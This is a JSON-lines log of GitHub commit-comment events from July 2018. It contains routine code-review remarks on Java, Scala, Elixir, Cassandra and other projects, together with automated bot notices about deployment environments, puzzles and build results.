{"id":"7945761925","type":"CommitCommentEvent","actor":{"login":"Rai4u"},"repo":{"name":"Rai4u/ListImplement"},"payload":{"comment":{"id":29661565,"position":45,"line":62,"path":"src/MyList.java","commit_id":"2ed8a521397411ac7e3232dff593d347a8f3dd1c","created_at":"2018-07-10T19:00:01Z","updated_at":"2018-07-10T19:00:01Z","author_association":"OWNER","body":"IndexOutOfBoundsException - if the index is out of range (index < 0 || index >= size())"}},"created_at":"2018-07-10T19:00:01Z"}
{"id":"7945767228","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29661577,"position":null,"line":null,"path":null,"commit_id":"e9b300f1f88e26a133bfbe5fa4c1432c8b9fb67e","created_at":"2018-07-10T19:00:58Z","updated_at":"2018-07-10T19:00:58Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T19:00:58Z"}
{"id":"7945769310","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/ElixirRetry"},"payload":{"comment":{"id":29661582,"position":null,"line":null,"path":null,"commit_id":"5132f1135f3c2bd34db70c4dacecee0c74ccef4b","created_at":"2018-07-10T19:01:21Z","updated_at":"2018-07-10T19:01:21Z","author_association":"OWNER","body":"@fredwu I did spend some time trying to make `after/else` optional after the recent changes, but later discovered it wasn't as easy as I thought. Plus, I refactored my production code that uses this library and realized that while in some cases `after/else` is just essentially a passthrough, in others it forced me to explicitly handle the success and error cases separately."}},"created_at":"2018-07-10T19:01:21Z"}
{"id":"7945770505","type":"CommitCommentEvent","actor":{"login":"hcorion"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":29661584,"position":4,"line":143,"path":"rpcs3/Emu/Cell/Modules/cellGame.cpp","commit_id":"317698a15bd4a2cf849552d57a71418cd4622ace","created_at":"2018-07-10T19:01:34Z","updated_at":"2018-07-10T19:01:34Z","author_association":"CONTRIBUTOR","body":"We can't use Qt in core"}},"created_at":"2018-07-10T19:01:34Z"}
{"id":"7945771722","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29661585,"position":null,"line":null,"path":null,"commit_id":"b9dfa7538f6bf3594206146a5f2c2e63d692e5d7","created_at":"2018-07-10T19:01:50Z","updated_at":"2018-07-10T19:01:50Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-10T19:01:50Z"}
{"id":"7945772640","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/ElixirRetry"},"payload":{"comment":{"id":29661586,"position":null,"line":null,"path":null,"commit_id":"5132f1135f3c2bd34db70c4dacecee0c74ccef4b","created_at":"2018-07-10T19:02:00Z","updated_at":"2018-07-10T19:02:00Z","author_association":"OWNER","body":"@ericentin I might be wrong, but that's not how I read https://semver.org/#spec-item-4."}},"created_at":"2018-07-10T19:02:00Z"}
{"id":"7945773803","type":"CommitCommentEvent","actor":{"login":"msurguy"},"repo":{"name":"processing/processing-pi-website"},"payload":{"comment":{"id":29661589,"position":null,"line":null,"path":null,"commit_id":"9f308ea208974383ddeee7f99ce2691dbccc672f","created_at":"2018-07-10T19:02:12Z","updated_at":"2018-07-10T19:02:12Z","author_association":"COLLABORATOR","body":"@gohai thank you! This is good :) "}},"created_at":"2018-07-10T19:02:12Z"}
{"id":"7945774395","type":"CommitCommentEvent","actor":{"login":"sujeet"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29661591,"position":22,"line":22,"path":"src/compiler/scala/tools/reflect/quasiquotes/Placeholders.scala","commit_id":"7184fe0d3740ac8558067c18bdf449a65a8a26b9","created_at":"2018-07-10T19:02:18Z","updated_at":"2018-07-10T19:02:18Z","author_association":"NONE","body":"Thanks @densh for the prompt response! :)\r\n\r\nI guess I didn't ask the question properly. I meant to ask, why does the name mangling need to be non-deterministic? Or, to rephrase, instead of `nme.QUASIQUOTE_PREFIX + sessionSuffix`, what kind of collisions would we have if we simply had `nme.QUASIQUOTE_PREFIX` on line 26 below?\r\n\r\nDo we have any test cases around / can you think of cases off the top of your head where dropping the randomly generated `sessionSuffix` would result in name collisions? I'm not able to think of any...\r\n\r\nAnother way to ask the same question is: what would break if we simply drop `sessionSuffix`?\r\n\r\nI'm guessing, when you implemented the quasiquotes (sorry, I know it was half a decade ago), you must've run into some name collisions or similar problems. I'm just trying to understand what those problems were, in case you still remember.\r\n\r\nLooking at the code produced by `scala.meta`'s quasiquotes, it seems like they managed to do it without compromising determinism (which I've pasted below for easy reference).\r\n\r\nWhen I look at the output of `-Xprint:typer` for the following code:\r\n\r\n```scala\r\nobject Foo {\r\n  val q\"$func($arg1, $arg2)\" = q\"foo(bar, blah)\"\r\n}\r\n```\r\n\r\nThe generated anon class looks like the following:\r\n```scala\r\nfinal class $anon extends AnyRef {\r\n  def unapply(\r\n    tree: Any\r\n  ): Option[(Tree, Tree, Tree)] = tree match {\r\n    case TreeTag.unapply(<unapply-selector>) <unapply> (SyntacticApplied.unapply(<unapply-selector>) <unapply> ((qq$79316094$macro$1 @ _), (head: List[Tree], tl: List[List[Tree]])::[List[Tree]]((head: Tree, tl: List[Tree])::[Tree]((qq$79316094$macro$2 @ _), (head: Tree, tl: List[Tree])::[Tree]((qq$79316094$macro$3 @ _), Nil)), Nil))) => Some((qq$79316094$macro$1, qq$79316094$macro$2, qq$79316094$macro$3))\r\n    case _ => None\r\n  }\r\n}\r\n```\r\nWhere the mangled names are: `qq$79316094$macro$1`, `qq$79316094$macro$2`, and `qq$79316094$macro$3`.\r\n\r\nThe same code, when I use `scala.meta` quasiquotes, produces the following anon class:\r\n```scala\r\nfinal class $anon extends AnyRef {\r\n  def unapply(\r\n    input: Tree\r\n  ): Option[(Term, Term, Term)] = input match {\r\n    case Term.unapply(<unapply-selector>) <unapply> ((quasiquote$macro$2$hole$0 @ _), List.unapplySeq[Term](<unapply-selector>) <unapply> ((quasiquote$macro$2$hole$1 @ _), (quasiquote$macro$2$hole$2 @ _))) =>\r\n      (Some((quasiquote$macro$2$hole$0: Term)), Some((quasiquote$macro$2$hole$1: Term)), Some((quasiquote$macro$2$hole$2: Term))) match {\r\n        case (_1: Some[Term], _2: Some[Term], _3: Some[Term])(Some[Term], Some[Term], Some[Term])((value: Term)Some((quasiquote$macro$2$result$0 @ _)), (value: Term)Some((quasiquote$macro$2$result$1 @ _)), (value: Term)Some((quasiquote$macro$2$result$2 @ _))) => Some((quasiquote$macro$2$result$0, quasiquote$macro$2$result$1, quasiquote$macro$2$result$2))\r\n        case _ => None\r\n      }\r\n    case _ => None\r\n  }\r\n}\r\n```\r\nWhere the mangled names are of the form `quasiquote$macro$<num>$hole$<num2>` and `quasiquote$macro$<num>$result$<num2>` (devoid of any unique/randomly generated stuff).\r\n\r\nI've also filed a issue on the scala bug tracker here: https://github.com/scala/bug/issues/11008 (code generated is different every time, breaking bazel caches)"}},"created_at":"2018-07-10T19:02:18Z"}
{"id":"7945781633","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"Cxbx-Reloaded/Cxbx-Reloaded"},"payload":{"comment":{"id":29661602,"position":6,"line":null,"path":"src/CxbxKrnl/EmuX86.cpp","commit_id":"cc6a1b6de5cfb5f997c010adbca1421a405e1264","created_at":"2018-07-10T19:03:44Z","updated_at":"2018-07-10T19:03:44Z","author_association":"MEMBER","body":"Typo"}},"created_at":"2018-07-10T19:03:44Z"}
{"id":"7945782805","type":"CommitCommentEvent","actor":{"login":"MoonStorm"},"repo":{"name":"ReactiveX/rxjs"},"payload":{"comment":{"id":29661606,"position":null,"line":null,"path":null,"commit_id":"1b23aceb66fdcd0858955a6459537fd794880fc5","created_at":"2018-07-10T19:03:59Z","updated_at":"2018-07-10T19:03:59Z","author_association":"NONE","body":"Not really @webbiscuit . It's not the same thing in so many ways."}},"created_at":"2018-07-10T19:03:59Z"}
{"id":"7945791092","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29661615,"position":null,"line":null,"path":null,"commit_id":"b2bb1a7e8fa3e3d3ff76e2acdaf135e26789e1b3","created_at":"2018-07-10T19:05:34Z","updated_at":"2018-07-10T19:05:34Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#ci-459](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#ci-459).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-459-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-10T19:05:34Z"}
{"id":"7945791212","type":"CommitCommentEvent","actor":{"login":"rynogg"},"repo":{"name":"rynogg/rttim"},"payload":{"comment":{"id":29661616,"position":5,"line":420,"path":"game/toontown/toon/Toon.py","commit_id":"60bb3ff119da1365905679787f1a32a31b1acea9","created_at":"2018-07-10T19:05:35Z","updated_at":"2018-07-10T19:05:35Z","author_association":"OWNER","body":"realistically speaking, you didnt need to make this change, but oh well"}},"created_at":"2018-07-10T19:05:35Z"}
{"id":"7945791536","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29661618,"position":9,"line":9499,"path":"filters/filters.txt","commit_id":"c3b49fa66a15e6324dde41cbc9316f4388ee4af2","created_at":"2018-07-10T19:05:39Z","updated_at":"2018-07-10T19:05:39Z","author_association":"CONTRIBUTOR","body":"Better adding `1tiny.net/1up/`instead of `##[src^=\"https://www.1tiny.net/1up/\"]`\r\n3 year ago https://forums.lanik.us/viewtopic.php?p=68014#p68014"}},"created_at":"2018-07-10T19:05:39Z"}
{"id":"7945795598","type":"CommitCommentEvent","actor":{"login":"evosniak"},"repo":{"name":"evosniak/far-web"},"payload":{"comment":{"id":29661622,"position":null,"line":null,"path":null,"commit_id":"5460b715a3e7fa759d484c619df9b6b7a5213811","created_at":"2018-07-10T19:06:33Z","updated_at":"2018-07-10T19:06:33Z","author_association":"OWNER","body":"Also fixed formArray references for real this time."}},"created_at":"2018-07-10T19:06:33Z"}
{"id":"7945797932","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29661629,"position":null,"line":null,"path":null,"commit_id":"e6afe4ecd9e071a551e0990785ab684311bed178","created_at":"2018-07-10T19:07:02Z","updated_at":"2018-07-10T19:07:02Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18-test](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18-test).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-test-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-10T19:07:02Z"}
{"id":"7945802012","type":"CommitCommentEvent","actor":{"login":"AndriyMatsevko"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661634,"position":43,"line":51,"path":"HomeWork4/HW4Task2/src/com/Dog.java","commit_id":"a9436ea7e5970cd6e8af88340d983fc6e0923e6b","created_at":"2018-07-10T19:07:54Z","updated_at":"2018-07-10T19:07:54Z","author_association":"COLLABORATOR","body":"Ну тут я шукаю найстарішого собаку і вертаю його. Цикл перебирає всі об'єкти і шукає найстарішу собаку, собак може бути багато тому я використав невизначену кількість аргументів які передаються в метод і задав циклу кількість тих аргументів які будуть введені."}},"created_at":"2018-07-10T19:07:54Z"}
{"id":"7945804771","type":"CommitCommentEvent","actor":{"login":"fgeek"},"repo":{"name":"Dolibarr/dolibarr"},"payload":{"comment":{"id":29661638,"position":null,"line":null,"path":null,"commit_id":"36402c22eef49d60edd73a2f312f8e28fe0bd1cb","created_at":"2018-07-10T19:08:30Z","updated_at":"2018-07-10T19:08:30Z","author_association":"NONE","body":"Could you release new version including these fixes?"}},"created_at":"2018-07-10T19:08:30Z"}
{"id":"7945807162","type":"CommitCommentEvent","actor":{"login":"stffrd"},"repo":{"name":"tivac/aws-sig"},"payload":{"comment":{"id":29661645,"position":4,"line":8,"path":"src/index.js","commit_id":"1df5fc698a28cd800921aa185204dff173c78611","created_at":"2018-07-10T19:09:00Z","updated_at":"2018-07-10T19:09:00Z","author_association":"NONE","body":"👏 👏 👏 👏 👏 👏 👏 👏 👏 👏 "}},"created_at":"2018-07-10T19:09:00Z"}
{"id":"7945810496","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29661657,"position":null,"line":null,"path":null,"commit_id":"5bb58b71349c4122b114321e3011f9835d9990f8","created_at":"2018-07-10T19:09:47Z","updated_at":"2018-07-10T19:09:47Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-clean](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-clean).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-clean-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-10T19:09:47Z"}
{"id":"7945813497","type":"CommitCommentEvent","actor":{"login":"Kaushikdeka97"},"repo":{"name":"aqib9/Be-Unique"},"payload":{"comment":{"id":29661664,"position":null,"line":null,"path":null,"commit_id":"d0d86fd9d2a3ec50f89037a7bf658d0c960d0db5","created_at":"2018-07-10T19:10:28Z","updated_at":"2018-07-10T19:10:28Z","author_association":"COLLABORATOR","body":"Unique"}},"created_at":"2018-07-10T19:10:28Z"}
{"id":"7945814496","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29661665,"position":null,"line":null,"path":null,"commit_id":"56e20e714715e0cad47c9bb870cf86d6a22f71fa","created_at":"2018-07-10T19:10:41Z","updated_at":"2018-07-10T19:10:41Z","author_association":"NONE","body":"Puzzle `228-5ca94c9b` disappeared from [`src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java`](https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java), that's why I closed #231. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-10T19:10:41Z"}
{"id":"7945814761","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29661666,"position":null,"line":null,"path":null,"commit_id":"56e20e714715e0cad47c9bb870cf86d6a22f71fa","created_at":"2018-07-10T19:10:44Z","updated_at":"2018-07-10T19:10:44Z","author_association":"NONE","body":"Puzzle `231-5ca94c9b` discovered in   [`src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java`](  https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java)   and submitted as #233. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T19:10:44Z"}
{"id":"7945815644","type":"CommitCommentEvent","actor":{"login":"cchloe2311"},"repo":{"name":"seven-up-purdue/networking-ad-hoc"},"payload":{"comment":{"id":29661668,"position":null,"line":null,"path":null,"commit_id":"86efbb0427caf7a4826afe53144d8682cbcc681d","created_at":"2018-07-10T19:10:56Z","updated_at":"2018-07-10T19:10:56Z","author_association":"CONTRIBUTOR","body":"reference snowdeer.githpyub.io/python/2017/11/15/python-raspberry-pyaudio-example/"}},"created_at":"2018-07-10T19:10:56Z"}
{"id":"7945817327","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29661676,"position":null,"line":null,"path":null,"commit_id":"9d47ba7d0252115fec3b0d24cf7abf99cb1e5048","created_at":"2018-07-10T19:11:18Z","updated_at":"2018-07-10T19:11:18Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-10T19:11:18Z"}
{"id":"7945819624","type":"CommitCommentEvent","actor":{"login":"RyanSquared"},"repo":{"name":"hashbang/book"},"payload":{"comment":{"id":29661681,"position":24,"line":117,"path":"1-Internet/3-irc.md","commit_id":"6756981eb0d22507515d093ac06bc612bb321d2b","created_at":"2018-07-10T19:11:45Z","updated_at":"2018-07-10T19:11:45Z","author_association":"NONE","body":"nit: multi-word arguments need to be preceded by a `:`"}},"created_at":"2018-07-10T19:11:45Z"}
{"id":"7945825889","type":"CommitCommentEvent","actor":{"login":"SaiVinay007"},"repo":{"name":"SaiVinay007/ubuntu-scripts"},"payload":{"comment":{"id":29661696,"position":null,"line":null,"path":null,"commit_id":"5a9d93afdede341384f8369d98fc0051a9576b11","created_at":"2018-07-10T19:13:05Z","updated_at":"2018-07-10T19:13:05Z","author_association":"OWNER","body":"installing r and r studio on ubuntu 16.04"}},"created_at":"2018-07-10T19:13:05Z"}
{"id":"7945828946","type":"CommitCommentEvent","actor":{"login":"mths0x5f"},"repo":{"name":"wix/react-native-navigation"},"payload":{"comment":{"id":29661708,"position":null,"line":null,"path":null,"commit_id":"b2a8ac41e5c2940b9f20748b65e0f1cfcfbb9bea","created_at":"2018-07-10T19:13:46Z","updated_at":"2018-07-10T19:13:46Z","author_association":"NONE","body":"seems that 'fontSize' and 'visible' params are not working. I'll try to understand a little bit more this code."}},"created_at":"2018-07-10T19:13:46Z"}
{"id":"7945829210","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29661709,"position":1,"line":1,"path":"classes/webservice.php.rej","commit_id":"abbf8e68878a2978783740f2468b185a8363d6a8","created_at":"2018-07-10T19:13:49Z","updated_at":"2018-07-10T19:13:49Z","author_association":"MEMBER","body":"@Rohanator9000 This file is just a diff.. if you cannot apply the patch cleanly maybe you first need to start your branch off this branch: https://github.com/tigusigalpa/moodle-mod_zoom/tree/zoomapiv2\r\n\r\nAnd then apply the patch file on top."}},"created_at":"2018-07-10T19:13:49Z"}
{"id":"7945852417","type":"CommitCommentEvent","actor":{"login":"laurenfraser2"},"repo":{"name":"lucieleblanc/CodeU-Summer-2018"},"payload":{"comment":{"id":29661760,"position":null,"line":null,"path":null,"commit_id":"03c05f4660c859fc184cb6750b7e4a5088282c3e","created_at":"2018-07-10T19:18:44Z","updated_at":"2018-07-10T19:18:44Z","author_association":"COLLABORATOR","body":"Is there a specific reason for calling the list in line 77 fakeConvoHashMap? I was trying to work with hashmaps a while back, but didn't understand fully."}},"created_at":"2018-07-10T19:18:44Z"}
{"id":"7945863583","type":"CommitCommentEvent","actor":{"login":"IstenesImre"},"repo":{"name":"icebob/hasznaltauto-figyelo"},"payload":{"comment":{"id":29661781,"position":null,"line":null,"path":null,"commit_id":"b7987c5bc35e87c42c66547e2d31172515eb7005","created_at":"2018-07-10T19:21:06Z","updated_at":"2018-07-10T19:21:06Z","author_association":"NONE","body":":beers:"}},"created_at":"2018-07-10T19:21:06Z"}
{"id":"7945865785","type":"CommitCommentEvent","actor":{"login":"lthill"},"repo":{"name":"teodoryantcheff/OSPy"},"payload":{"comment":{"id":29661784,"position":null,"line":null,"path":null,"commit_id":"8e2f0b15bb35c3ce4ddf43f03b61e35a49721c47","created_at":"2018-07-10T19:21:32Z","updated_at":"2018-07-10T19:21:32Z","author_association":"NONE","body":"What hardware are you using for a radio? The link to google docs is not publicly accessible:\r\nhttps://docs.google.com/document/d/1FiQ4Q2LxqjEiFXdZioh2Kb4eAb2XIkMK5a_XP6EbG3w"}},"created_at":"2018-07-10T19:21:32Z"}
{"id":"7945868904","type":"CommitCommentEvent","actor":{"login":"ericentin"},"repo":{"name":"safwank/ElixirRetry"},"payload":{"comment":{"id":29661795,"position":null,"line":null,"path":null,"commit_id":"5132f1135f3c2bd34db70c4dacecee0c74ccef4b","created_at":"2018-07-10T19:22:11Z","updated_at":"2018-07-10T19:22:11Z","author_association":"NONE","body":"Given a version number MAJOR.MINOR.PATCH, increment the:\r\n\r\nMAJOR version when you make incompatible API changes,"}},"created_at":"2018-07-10T19:22:11Z"}
{"id":"7945870691","type":"CommitCommentEvent","actor":{"login":"VictorAlonsoCM"},"repo":{"name":"VictorAlonsoCM/Specialized-Program-Full-Stack-Web-and-Multiplatform-Mobile-App-Development"},"payload":{"comment":{"id":29661797,"position":null,"line":null,"path":null,"commit_id":"078f90e9dd50f172a8da2ff33d4bb08ae8aeaed6","created_at":"2018-07-10T19:22:34Z","updated_at":"2018-07-10T19:22:34Z","author_association":"OWNER","body":"Styling using Less CSS Preprocessor"}},"created_at":"2018-07-10T19:22:34Z"}
{"id":"7945872776","type":"CommitCommentEvent","actor":{"login":"VictorAlonsoCM"},"repo":{"name":"VictorAlonsoCM/Specialized-Program-Full-Stack-Web-and-Multiplatform-Mobile-App-Development"},"payload":{"comment":{"id":29661799,"position":null,"line":null,"path":null,"commit_id":"078f90e9dd50f172a8da2ff33d4bb08ae8aeaed6","created_at":"2018-07-10T19:23:00Z","updated_at":"2018-07-10T19:23:00Z","author_association":"OWNER","body":"Styling using Less CSS Preprocessor"}},"created_at":"2018-07-10T19:23:00Z"}
{"id":"7945874993","type":"CommitCommentEvent","actor":{"login":"JessiSandovalE"},"repo":{"name":"ABLions/TalentoHumano"},"payload":{"comment":{"id":29661805,"position":2,"line":2,"path":"README.md","commit_id":"6e09ebacaeb71e63095d6406e6d9e1a65a68804c","created_at":"2018-07-10T19:23:29Z","updated_at":"2018-07-10T19:23:29Z","author_association":"COLLABORATOR","body":"egtrgtrgtrgrg"}},"created_at":"2018-07-10T19:23:29Z"}
{"id":"7945877685","type":"CommitCommentEvent","actor":{"login":"ALFINONH"},"repo":{"name":"ALFINONH/FinbotV1"},"payload":{"comment":{"id":29661811,"position":null,"line":null,"path":null,"commit_id":"2de5df4fa9d7bb9b24f94f4193bf31aa53394291","created_at":"2018-07-10T19:24:04Z","updated_at":"2018-07-10T19:24:04Z","author_association":"OWNER","body":"Need more 100 cmmt"}},"created_at":"2018-07-10T19:24:04Z"}
{"id":"7945901625","type":"CommitCommentEvent","actor":{"login":"mprins"},"repo":{"name":"B3Partners/brmo"},"payload":{"comment":{"id":29661874,"position":9,"line":353,"path":"brmo-loader/src/main/java/nl/b3p/brmo/loader/RsgbProxy.java","commit_id":"fecf1f398996d523b70af17912f48ec8bcb67dc9","created_at":"2018-07-10T19:29:12Z","updated_at":"2018-07-10T19:29:12Z","author_association":"MEMBER","body":"De throw moet een BrmoException zijn of liever nog een meer specifieke (nieuwe) LeegBrXmlException die een subklasse is van BrmoException.\r\n\r\nIk denk dat de enige die deze melding ooit ziet de beheerder is..."}},"created_at":"2018-07-10T19:29:12Z"}
{"id":"7945903355","type":"CommitCommentEvent","actor":{"login":"generic-github-user"},"repo":{"name":"generic-github-user/worst-syntax-ever"},"payload":{"comment":{"id":29661877,"position":null,"line":null,"path":null,"commit_id":"1647708462f767ed7d1f95fe7a8341da98c894b7","created_at":"2018-07-10T19:29:34Z","updated_at":"2018-07-10T19:29:34Z","author_association":"OWNER","body":"I probably won't follow these templates."}},"created_at":"2018-07-10T19:29:34Z"}
{"id":"7945904476","type":"CommitCommentEvent","actor":{"login":"aweisberg"},"repo":{"name":"apache/cassandra"},"payload":{"comment":{"id":29661879,"position":119,"line":93,"path":"src/java/org/apache/cassandra/net/async/MessageInHandler.java","commit_id":"06209037ea56b5a2a49615a99f1542d6ea1b2947","created_at":"2018-07-10T19:29:49Z","updated_at":"2018-07-10T19:29:49Z","author_association":"CONTRIBUTOR","body":"This results in from not always being the broadcast address. It's a serious change in behavior as the non-broadcast address is frequently not recognized as the identifier for a node."}},"created_at":"2018-07-10T19:29:49Z"}
{"id":"7945907796","type":"CommitCommentEvent","actor":{"login":"rogeruiz"},"repo":{"name":"18F/cg-provision"},"payload":{"comment":{"id":29661892,"position":1,"line":1,"path":"terraform/modules/credhub/elb.tf","commit_id":"28eae0b114c99ed9e718befa6a3167be00e26c47","created_at":"2018-07-10T19:30:30Z","updated_at":"2018-07-10T19:30:30Z","author_association":"MEMBER","body":"oh good point. I'm removing this. we don't need it on the internet, I didn't realize we had the cli installed on our jump boxes. "}},"created_at":"2018-07-10T19:30:30Z"}
{"id":"7945909402","type":"CommitCommentEvent","actor":{"login":"implmnt"},"repo":{"name":"abxaz92/scala-play-hello-world"},"payload":{"comment":{"id":29661901,"position":15,"line":15,"path":"app/services/ExcelParser.scala","commit_id":"94de4f1ff4e19cccbb6d5f61e721a949e73b58a0","created_at":"2018-07-10T19:30:50Z","updated_at":"2018-07-10T19:30:50Z","author_association":"COLLABORATOR","body":"`val logger = Logger(classOf[ExcelParser])`"}},"created_at":"2018-07-10T19:30:50Z"}
{"id":"7945913850","type":"CommitCommentEvent","actor":{"login":"implmnt"},"repo":{"name":"abxaz92/scala-play-hello-world"},"payload":{"comment":{"id":29661911,"position":33,"line":33,"path":"app/services/ExcelParser.scala","commit_id":"94de4f1ff4e19cccbb6d5f61e721a949e73b58a0","created_at":"2018-07-10T19:31:46Z","updated_at":"2018-07-10T19:31:46Z","author_association":"COLLABORATOR","body":"`Tuple3` можно не писать ) "}},"created_at":"2018-07-10T19:31:46Z"}
{"id":"7945920468","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29661926,"position":null,"line":null,"path":null,"commit_id":"d8f70a5f4083273445b5f5fa9287bb341681f6f9","created_at":"2018-07-10T19:33:13Z","updated_at":"2018-07-10T19:33:13Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/d8f70a5f4083273445b5f5fa9287bb341681f6f9#commitcomment-29659305) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/170ee26c6d5f80dbd0c3c33f0daf5f8185d35a00/daily_2018_7_10/report.md). cc @ararslan"}},"created_at":"2018-07-10T19:33:13Z"}
{"id":"7945920811","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29661927,"position":null,"line":null,"path":null,"commit_id":"85a0f63c15b8613e2406f3bc28e4a242cf2c3e60","created_at":"2018-07-10T19:33:18Z","updated_at":"2018-07-10T19:33:18Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-45](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-45-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-10T19:33:18Z"}
{"id":"7945921685","type":"CommitCommentEvent","actor":{"login":"jasongaare"},"repo":{"name":"anaerobic/react-native-walkthrough-tooltip"},"payload":{"comment":{"id":29661932,"position":null,"line":null,"path":null,"commit_id":"efe5daa2dbb6059d0d23a9f2bc6354a5652d1502","created_at":"2018-07-10T19:33:28Z","updated_at":"2018-07-10T19:33:28Z","author_association":"NONE","body":"good catch! if you'd like to submit a PR I'd gladly merge it"}},"created_at":"2018-07-10T19:33:28Z"}
{"id":"7945923375","type":"CommitCommentEvent","actor":{"login":"Kirzak0520"},"repo":{"name":"IdleRPGBot/IdleRPG"},"payload":{"comment":{"id":29661938,"position":null,"line":null,"path":null,"commit_id":"250e69d530328ee19350d83504793747a8a2c8dd","created_at":"2018-07-10T19:33:50Z","updated_at":"2018-07-10T19:33:50Z","author_association":"NONE","body":"**_------- SUGGESTION -------_**\r\nIt would be awesome to add a feature in wich you can actually \"fight\" against a boss when an adventure reach its end. For example, there are Pokémon battle bots that use a battle system, maybe you can do something similar..."}},"created_at":"2018-07-10T19:33:50Z"}
{"id":"7945924880","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29661941,"position":null,"line":null,"path":null,"commit_id":"d24f4fce0fe6b970b702d6719aba7e533a2fba83","created_at":"2018-07-10T19:34:10Z","updated_at":"2018-07-10T19:34:10Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T19:34:10Z"}
